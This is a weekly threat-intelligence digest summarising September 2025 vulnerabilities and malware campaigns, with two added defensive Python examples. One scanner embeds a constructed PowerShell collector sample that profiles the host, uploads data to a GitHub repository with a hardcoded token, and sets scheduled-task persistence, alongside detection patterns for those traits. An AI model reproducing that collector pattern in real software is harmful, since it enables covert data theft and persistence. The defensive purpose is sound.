Cyware Weekly Threat Intelligence, September 08–12, 2025

The Good
CISA’s new playbook is shaking up the CVE program. Its Quality Era pushes for better automation, APIs, and data standards. With a focus on transparency and global partnerships, it aims to keep vulnerability management vendor-neutral and collaborative. California’s latest privacy law is forcing browsers to step up. Every website visit will carry user requests to block third-party data grabs, boosting consumer control.
- CISA has released a strategic document, CVE Quality for a Cyber Secure Future, outlining its commitment to the CVE program, emphasizing the need for public maintenance and vendor neutrality. This initiative, termed the "Quality Era," aims to enhance the program's leadership and funding mechanisms while encouraging broader multi-sector engagement. Key priorities include modernizing CVE operations through improved automation, API support, and data quality standards. The roadmap also focuses on enhancing transparency and communication within the CVE ecosystem. CISA intends to leverage partnerships with international organizations and various stakeholders to ensure comprehensive representation and collaboration, marking a significant transition from the previous "Growth Era" to a more quality-focused approach in vulnerability management.
- California has passed a bill mandating web browsers to include a feature that allows consumers to automatically opt out of data sharing with third parties. This legislation builds on the California Consumer Privacy Act, which grants consumers the right to send opt-out preference signals. The law will require browsers to enable users to send opt-out requests to every website they visit. 
The Bad
Akira ransomware is busting into networks through SonicWall's CVE-2024-40766 flaw. ACSC warns of fresh exploits since September, with 40 incidents probed. A rogue Chrome extension, Madgicx Plus, is preying on Meta advertisers with a slick AI optimization pitch. This malware, spread through polished domains tied to past scams, hijacks Google and Facebook accounts, siphoning off valuable ad assets with deceptive ease. Masquerading as harmless GitHub files, Kimsuky is sneaking malware into systems with malicious LNK files.
- The Akira ransomware gang is exploiting CVE-2024-40766, a critical vulnerability in SonicWall SSL VPN devices, to gain unauthorized access to networks via unpatched endpoints. SonicWall released a patch for CVE-2024-40766 in August 2024 but emphasized that password resets are necessary to prevent exploitation of exposed credentials. Akira ransomware began exploiting this vulnerability in September 2024, with recent activity prompting warnings from the ACSC. SonicWall clarified that the recent activity is linked to CVE-2024-40766 and not a zero-day vulnerability, with investigations into 40 related security incidents. 
- A malicious Chrome extension campaign is targeting Meta (Facebook/Instagram) advertisers by masquerading as a legitimate AI-driven ad optimization tool called Madgicx Plus. This extension, promoted as a productivity enhancer, actually functions as malware capable of hijacking business sessions and stealing credentials. The campaign utilizes a network of professionally crafted domains, some previously linked to other malicious activities, to distribute the compromised extension. It captures Google account details before prompting users to connect their Facebook accounts, thereby broadening its access to valuable advertising assets. The reuse of infrastructure and domains indicates that this campaign is an evolution of prior malicious efforts rather than isolated incidents. 
- North Korea–backed Kimsuky has been observed exploiting GitHub repositories for malware delivery and data exfiltration. They utilize malicious LNK files that execute PowerShell scripts to download additional payloads from private GitHub repositories. These scripts, which include hardcoded GitHub Private Tokens, gather system metadata such as boot time, OS configuration, and running processes, subsequently uploading this information to attacker-controlled repositories. The malware establishes persistence by creating scheduled tasks that enable the execution of updated scripts at regular intervals. Investigations have linked Kimsuky to nine private repositories containing exfiltrated logs, decoy documents, and files resembling payment reminders. 
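The Kimsuky item above describes PowerShell collectors that carry hardcoded GitHub tokens, profile the host, push the results to a private repository, and register a scheduled task. A defender triaging recovered scripts can key on exactly those traits. The following is an added example, not code from Cyware or from the researchers who reported the campaign: a small indicator-based triage of PowerShell text. The two scripts it scans are constructed for the demo, the token is a placeholder with the shape of a classic GitHub PAT (`ghp_` plus 36 characters), and the repository and task names are invented.

```python
import re
from dataclasses import dataclass, field

# Placeholder credential with the length of a classic GitHub PAT; not a real token.
FAKE_TOKEN = "ghp_" + "PLACEHOLDER".ljust(36, "0")

# Constructed samples: one resembles the collector behaviour described in the report,
# the other is an ordinary CI helper that reads its token from the environment.
SAMPLE_SCRIPTS = {
    "collector.ps1": r'''
$token = "__TOKEN__"
$h = @{ Authorization = "token $token" }
$info = (Get-CimInstance Win32_OperatingSystem | Select-Object LastBootUpTime, Caption | Out-String)
$info += (Get-Process | Select-Object Name | Out-String)
Invoke-RestMethod -Uri "https://api.github.com/repos/example-org/example-repo/contents/log.txt" -Headers $h -Method Put
schtasks /create /sc minute /mo 30 /tn "Updater" /tr "powershell -File $env:APPDATA\collector.ps1"
'''.replace("__TOKEN__", FAKE_TOKEN),
    "benign_build.ps1": r'''
# CI helper: publishes release notes using a token supplied by the runner, never inline
$h = @{ Authorization = "token $env:GITHUB_TOKEN" }
Invoke-RestMethod -Uri "https://api.github.com/repos/example-org/example-repo/releases" -Headers $h
''',
}

# Each indicator is a label plus a regex; the labels map to the behaviours named in the report.
INDICATORS = [
    ("hardcoded_github_token",
     re.compile(r"\b(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")),
    # Write to the GitHub Contents API (PUT) = uploading collected data to a repository.
    ("github_contents_upload",
     re.compile(r"api\.github\.com/repos/[^\s\"']+/contents/[^\s\"']+[^\n]*-Method\s+Put", re.I)),
    # Boot time, OS details and process list, as described for the collector scripts.
    ("host_profiling",
     re.compile(r"Win32_OperatingSystem|LastBootUpTime|Get-Process", re.I)),
    # Scheduled-task creation used for periodic re-execution.
    ("scheduled_task_persistence",
     re.compile(r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I)),
]


@dataclass
class Finding:
    script: str
    indicators: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def triage_script(name: str, text: str) -> Finding:
    """Return the indicator labels whose pattern occurs anywhere in the script text."""
    return Finding(name, [label for label, rx in INDICATORS if rx.search(text)])


def triage_all(scripts: dict) -> dict:
    return {name: triage_script(name, text) for name, text in scripts.items()}


def is_suspicious(finding: Finding) -> bool:
    """A literal token plus at least two of the other behaviours is the combination worth escalating."""
    return "hardcoded_github_token" in finding.indicators and finding.score >= 3


if __name__ == "__main__":
    for f in triage_all(SAMPLE_SCRIPTS).values():
        print(f"{f.script}: score={f.score} suspicious={is_suspicious(f)} {f.indicators}")
```

The token regexes only catch literals embedded in the script; a token pulled from a file or decoded at runtime needs a different check, which is why the other three indicators are scored alongside it rather than relying on the credential pattern alone.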
- Microsoft released security updates for 81 flaws, including two zero-day vulnerabilities: CVE-2025-55234 (Windows SMB Elevation of Privilege) and CVE-2024-21907 (Improper Handling of Exceptional Conditions in Newtonsoft.Json). The updates address nine critical vulnerabilities, including remote code execution, information disclosure, and elevation of privilege issues. Microsoft recommends enabling SMB Server Signing and SMB Server Extended Protection for Authentication to mitigate relay attacks, but warns of potential compatibility issues. Updates for Microsoft SQL Server include fixes for vulnerabilities in Newtonsoft.Json, addressing denial of service risks caused by crafted data. 
- Threat hunters have discovered 45 previously unreported domains associated with the China-linked cyber espionage groups Salt Typhoon and UNC4841, with some domains dating back to May 2020. These findings indicate that Salt Typhoon was involved in activities prior to the notable attacks in 2024. The identified domains share some overlap with UNC4841, known for exploiting a critical vulnerability in Barracuda Email Security Gateway appliances. Investigations revealed that many domains were registered using fake identities and Proton Mail addresses, with some pointing to high-density IP addresses. The oldest domain linked to these espionage campaigns, onlineeylity[.]com, was registered on May 19, 2020, by a fictitious persona, underscoring the long-term nature of these cyber threats. 
- Cybercriminals are intensifying their attacks on macOS users by deploying the Odyssey stealer through a fraudulent Microsoft Teams download site. This sophisticated campaign involves attackers impersonating Microsoft Teams via the domain teamsonsoft[.]com, complete with official branding to deceive victims. When users attempt to download what they believe is the legitimate application, they are prompted to execute a command that installs the malware. The Odyssey stealer is capable of extensive data theft, targeting sensitive information such as browser credentials, cryptocurrency wallet data, and system details. It employs social engineering tactics to gain elevated privileges and maintains persistence by replacing legitimate applications. The stolen data is exfiltrated to the attackers' C2 server, making it a significant threat to macOS users. 
- iCloud Calendar invites are being exploited to send phishing emails disguised as payment notifications, originating from Apple’s email servers to bypass spam filters. The phishing emails aim to scare recipients into calling a fake support number, where scammers attempt to gain remote access to steal money, deploy malware, or extract sensitive data. These phishing emails pass email security checks (SPF, DKIM, DMARC) and appear legitimate due to their origin from Apple’s servers. Scammers use the Notes field in iCloud Calendar invites to embed phishing messages and send them to mailing lists, targeting multiple victims. 
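Because the iCloud Calendar lures above are sent by Apple's own servers, SPF, DKIM and DMARC all pass and the authentication results carry no signal; what distinguishes them is the content of the invite itself: a payment notice and a callback number in the Notes field, sent to many recipients at once. The following is an added example, not code from Cyware or from the researchers who described the campaign: a dependency-free iCalendar (.ics) reader that unfolds the invite and scores its DESCRIPTION (the Notes field) and recipient list for the lure pattern. Both invites are constructed, and every address, phone number and amount in them is invented.

```python
import re

# Constructed invite resembling the lure: the Notes field carries a fake charge and a callback number.
LURE_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//Example//Constructed//EN",
    "METHOD:REQUEST",
    "BEGIN:VEVENT",
    "UID:constructed-0001@example.invalid",
    "ORGANIZER;CN=Billing Dept:mailto:billing-notice@example.invalid",
    "ATTENDEE:mailto:list-member-1@example.net",
    "ATTENDEE:mailto:list-member-2@example.net",
    "SUMMARY:Payment receipt",
    # RFC 5545 line folding: continuation lines start with a single space.
    "DESCRIPTION:Your account has been charged $599.00 for an annual subscript",
    " ion. If you did not authorize this payment\\, call support immediately at",
    " +1-555-0100 to cancel and request a refund.",
    "DTSTART:20250910T120000Z",
    "DTEND:20250910T123000Z",
    "END:VEVENT",
    "END:VCALENDAR",
])

# Constructed ordinary meeting invite for comparison.
BENIGN_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "METHOD:REQUEST", "BEGIN:VEVENT",
    "UID:constructed-0002@example.invalid",
    "ORGANIZER:mailto:colleague@example.net",
    "ATTENDEE:mailto:me@example.net",
    "SUMMARY:Weekly sync",
    "DESCRIPTION:Status update and planning for next sprint.",
    "DTSTART:20250911T090000Z", "DTEND:20250911T093000Z",
    "END:VEVENT", "END:VCALENDAR",
])

PHONE_RX = re.compile(r"\+?\d[\d\-\s().]{7,}\d")
PAYMENT_RX = re.compile(r"\b(charged|payment|invoice|refund|subscription|receipt)\b", re.I)
URGENCY_RX = re.compile(r"\b(immediately|did not authori[sz]e|unauthori[sz]ed|cancel|call (?:us|support|now))\b", re.I)


def unfold(ics: str) -> str:
    """Join folded lines (CRLF followed by a space or tab) back into single logical lines."""
    return re.sub(r"\r?\n[ \t]", "", ics)


def parse_event(ics: str) -> dict:
    """Return the properties of the first VEVENT; ATTENDEE values are collected into a list."""
    props, attendees, in_event = {}, [], False
    for line in unfold(ics).splitlines():
        if line == "BEGIN:VEVENT":
            in_event = True
            continue
        if line == "END:VEVENT":
            break
        if not in_event or ":" not in line:
            continue
        name_params, value = line.split(":", 1)
        name = name_params.split(";", 1)[0].upper()      # drop parameters such as ;CN=
        value = value.replace("\\,", ",").replace("\\n", "\n")
        if name == "ATTENDEE":
            attendees.append(value)
        else:
            props[name] = value
    props["ATTENDEES"] = attendees
    return props


def assess_invite(ics: str) -> dict:
    """Score the invite for the payment-scam pattern; two or more reasons marks it suspicious."""
    ev = parse_event(ics)
    notes = ev.get("DESCRIPTION", "") + " " + ev.get("SUMMARY", "")
    reasons = []
    if PHONE_RX.search(notes):
        reasons.append("callback_phone_in_notes")
    if PAYMENT_RX.search(notes):
        reasons.append("payment_lure")
    if URGENCY_RX.search(notes):
        reasons.append("urgency_language")
    if len(ev["ATTENDEES"]) > 1:
        reasons.append("multi_recipient_invite")    # invites blasted to a mailing list
    return {"uid": ev.get("UID"), "reasons": reasons, "suspicious": len(reasons) >= 2}


if __name__ == "__main__":
    print(assess_invite(LURE_ICS))
    print(assess_invite(BENIGN_ICS))
```

The unfold step matters: a filter that matches on raw lines misses the phone number when folding splits it from the sentence around it, and a large organizer-side tool can spread a lure across several folded lines by accident or on purpose.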
New Threats
Mustang Panda's latest ToneShell variant is digging deep into systems with slick persistence moves. Delivered via DLL sideloading in archives, it dodges analysis, enforces single-instance rules, and sets up scheduled tasks in user directories. Researchers uncovered a RAT storm hitting Chinese users since May. Phishing on GitHub Pages drops ValleyRAT, FatalRAT, and kkRAT, the latter echoing Ghost RAT with beefed-up encryption and commands. Slipping through macOS like a shadow in the fog, ChillyHell malware cloaks itself as a harmless app to wreak havoc.
- A new variant of the ToneShell backdoor, attributed to the Mustang Panda group, has emerged with advanced persistence and anti-analysis capabilities. Delivered through DLL sideloading within compressed archives, this variant employs sophisticated anti-analysis techniques to evade detection. It checks the execution environment to prevent self-infection and enforces a single-instance policy. The malware establishes persistence by copying itself and essential DLLs to a user profile directory and creates a scheduled task to ensure it runs regularly. Communication with its command and control server is disguised using a TLS-like protocol, and the payloads are XOR-obfuscated. This variant also generates unique GUIDs for each infected machine, ensuring continued operation. 
- VoidProxy is a sophisticated phishing-as-a-service (PhaaS) platform that leverages adversary-in-the-middle (AitM) techniques to compromise Microsoft and Google accounts by bypassing MFA. It operates using compromised email accounts and employs various evasion tactics, including URL obfuscation and disposable phishing domains, to avoid detection. Phishing campaigns begin with emails that contain shortened links leading to these domains, which are protected by Cloudflare CAPTCHA challenges. The attack unfolds in several stages, from delivery to session hijacking, allowing attackers to capture sensitive information like usernames, passwords, and MFA codes. VoidProxy’s backend features a web-based admin console that enables real-time management of phishing campaigns and stolen data extraction, making it a potent tool for cybercriminals.
- Zscaler ThreatLabz discovered a malware campaign targeting Chinese-speaking users since May 2025, delivering ValleyRAT, FatalRAT, and kkRAT. kkRAT shares code similarities with Ghost RAT and Big Bad Wolf, with enhanced encryption and additional commands. The campaign uses phishing sites hosted on GitHub Pages to deliver malicious installer packages. kkRAT employs sandbox/VM detection techniques, including time stability analysis and hardware configuration checks. kkRAT uses shellcode for multi-stage attacks, with decrypted payloads delivered via structured Base64-encoded data. Commands supported by kkRAT include clipboard hijacking to replace cryptocurrency wallet addresses, persistence establishment, and installing RMM tools like Sunlogin and GotoHTTP.
- ChillyHell is a sophisticated macOS malware that has recently emerged, utilizing advanced techniques to evade detection and maintain persistence. This malware employs three primary methods for persistence: LaunchAgent, LaunchDaemon, and shell profile injection, allowing it to execute upon user login or system boot. It masquerades as a benign application while actively collecting environmental data and profiling the host system. Notably, ChillyHell has remained notarized by Apple, which underscores its stealth capabilities. Its modular architecture enables various malicious activities, including spawning reverse shells, downloading payloads, and conducting brute force attacks on user credentials. 
- Salty2FA is a new and advanced phishing kit that targets enterprises in the U.S. and EU, designed to bypass various two-factor authentication methods. This PhaaS framework has been identified in campaigns targeting sectors such as finance, energy, and telecom. It employs multi-stage execution tactics, starting with convincing email lures that prompt urgency, leading victims to fake login pages that mimic legitimate sites. Once credentials are entered, the kit can intercept 2FA codes, allowing attackers to gain unauthorized access to accounts. 
- A new backdoor malware known as Buterat is spreading through phishing emails and trojanized downloads, primarily targeting government and enterprise networks. Once it infiltrates a device, Buterat hides within normal system processes and modifies registry keys to ensure persistence even after reboots. Utilizing advanced techniques like SetThreadContext and ResumeThread, it hijacks execution flow to evade detection by security systems. The malware communicates with remote C2 servers through encrypted channels, complicating identification efforts. During live testing, researchers noted that Buterat drops multiple payloads, such as amhost.exe and bmhost.exe, which enhance the attackers' control and capabilities. 
- MostereRAT is a sophisticated malware that initiates attacks through phishing emails targeting Japanese users, leading to the download of malicious payloads. It employs Easy Programming Language to create encrypted tools that bypass security measures and gain full control over infected systems. The malware operates by establishing SYSTEM-level privileges, using custom RPC communication, and creating persistent services. It effectively disables antivirus solutions and Windows security features, blocking their traffic to evade detection. MostereRAT communicates with C2 servers using mutual TLS for secure operations and leverages popular remote access tools like AnyDesk and TightVNC to maintain control. Additionally, it collects sensitive victim information and performs screen captures for data exfiltration.